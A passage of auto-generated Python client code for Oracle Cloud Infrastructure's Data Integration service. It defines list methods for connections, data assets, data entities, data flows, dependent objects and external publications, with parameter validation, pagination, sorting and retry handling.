resource_path = "/workspaces/{workspaceId}/connections"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"page",
"limit",
"fields",
"type",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_connections got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"dataAssetKey": data_asset_key,
"name": kwargs.get("name", missing),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"type": kwargs.get("type", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionSummaryCollection")
def list_data_assets(self, workspace_id, **kwargs):
"""
Retrieves a list of all data asset summaries.
:param str workspace_id: (required)
The workspace ID.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str type: (optional)
Type of the object to filter the results with.
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str name: (optional)
Used to filter by the name of the object.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataAssetSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_data_assets.py.html>`__ to see an example of how to use list_data_assets API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"page",
"limit",
"fields",
"type",
"sort_by",
"sort_order",
"name",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_assets got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"type": kwargs.get("type", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"name": kwargs.get("name", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataAssetSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataAssetSummaryCollection")
def list_data_entities(self, workspace_id, connection_key, schema_resource_name, **kwargs):
"""
Lists a summary of data entities from the data asset using the specified connection.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
The schema resource name used for retrieving schemas.
:param str name: (optional)
Used to filter by the name of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str type: (optional)
Type of the object to filter the results with.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] name_list: (optional)
Used to filter by the name of the object.
:param bool is_pattern: (optional)
This parameter can be used to specify whether entity search type is pattern search or not.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataEntitySummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_data_entities.py.html>`__ to see an example of how to use list_data_entities API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas/{schemaResourceName}/dataEntities"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"page",
"type",
"limit",
"fields",
"sort_by",
"sort_order",
"opc_request_id",
"name_list",
"is_pattern"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_entities got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key,
"schemaResourceName": schema_resource_name
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"name": kwargs.get("name", missing),
"page": kwargs.get("page", missing),
"type": kwargs.get("type", missing),
"limit": kwargs.get("limit", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"nameList": self.base_client.generate_collection_format_param(kwargs.get("name_list", missing), 'multi'),
"isPattern": kwargs.get("is_pattern", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataEntitySummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataEntitySummaryCollection")
def list_data_flow_validations(self, workspace_id, **kwargs):
"""
Retrieves a list of data flow validations within the specified workspace.
:param str workspace_id: (required)
The workspace ID.
:param str key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlowValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_data_flow_validations.py.html>`__ to see an example of how to use list_data_flow_validations API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlowValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"fields",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_flow_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": kwargs.get("key", missing),
"name": kwargs.get("name", missing),
"identifier": kwargs.get("identifier", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlowValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlowValidationSummaryCollection")
def list_data_flows(self, workspace_id, **kwargs):
"""
Retrieves a list of data flows in a project or folder.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str folder_id: (optional)
Unique key of the folder.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlowSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_data_flows.py.html>`__ to see an example of how to use list_data_flows API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlows"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"folder_id",
"fields",
"name",
"identifier",
"limit",
"page",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_flows got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"folderId": kwargs.get("folder_id", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlowSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlowSummaryCollection")
def list_dependent_objects(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of all dependent objects for a specific application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the published object.
:param list[str] type: (optional)
Used to filter by the object type of the object.
It can be suffixed with an optional filter operator InSubtree.
For Data Integration APIs, a filter based on type Task is used.
:param str type_in_subtree: (optional)
Used in association with type parameter. If value is true,
then type all sub types of the given type parameter is considered.
If value is false, then sub types are not considered. Default is false.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DependentObjectSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_dependent_objects.py.html>`__ to see an example of how to use list_dependent_objects API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/dependentObjects"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"fields",
"name",
"identifier",
"type",
"type_in_subtree",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_dependent_objects got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"typeInSubtree": kwargs.get("type_in_subtree", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DependentObjectSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DependentObjectSummaryCollection")
def list_external_publication_validations(self, workspace_id, task_key, **kwargs):
"""
Retrieves a lists of external publication validations in a workspace and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublicationValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_external_publication_validations.py.html>`__ to see an example of how to use list_external_publication_validations API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublicationValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"fields",
"name",
"identifier",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_external_publication_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ExternalPublicationValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ExternalPublicationValidationSummaryCollection")
def list_external_publications(self, workspace_id, task_key, **kwargs):
"""
Retrieves a list of external publications in an application and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
